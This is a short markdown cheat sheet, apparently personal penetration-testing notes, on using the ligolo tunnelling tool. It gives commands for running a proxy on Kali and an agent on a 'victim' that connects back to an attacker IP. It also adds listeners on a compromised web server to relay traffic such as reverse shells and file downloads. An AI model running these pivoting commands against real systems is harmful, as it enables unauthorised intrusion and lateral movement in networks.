Skip to content

Latest commit

 

History

History
29 lines (19 loc) · 788 Bytes

ligolo.md

File metadata and controls

29 lines (19 loc) · 788 Bytes

agent.se proxy on kali agent on victim sudo ip tuntap add user kali mode tun ligolo sudo ip link set ligolo up sudo ip route add 172.16.5.0/24 dev ligolo ./proxy -selfcert -laddr 0.0.0.0:9001

./agent -connect 10.10.14.213:9001 -ignore-cert

session start

Creates a listener on the machine where we're running the agent at port 1234
and redirects the traffic to port 4444 on our machine.
You can use other ports, of course.

listener_add --addr 0.0.0.0:1234 --to 0.0.0.0:4444 //on agent

Listener on the compromised web server at port 1235 forwarding traffic
to port 8000.

You can use any port you like, in our example I'm using port 8000
as it's the default port for a python HTTP server.

listener_add --addr 0.0.0.0:1235 --to 0.0.0.0:8000 //on agent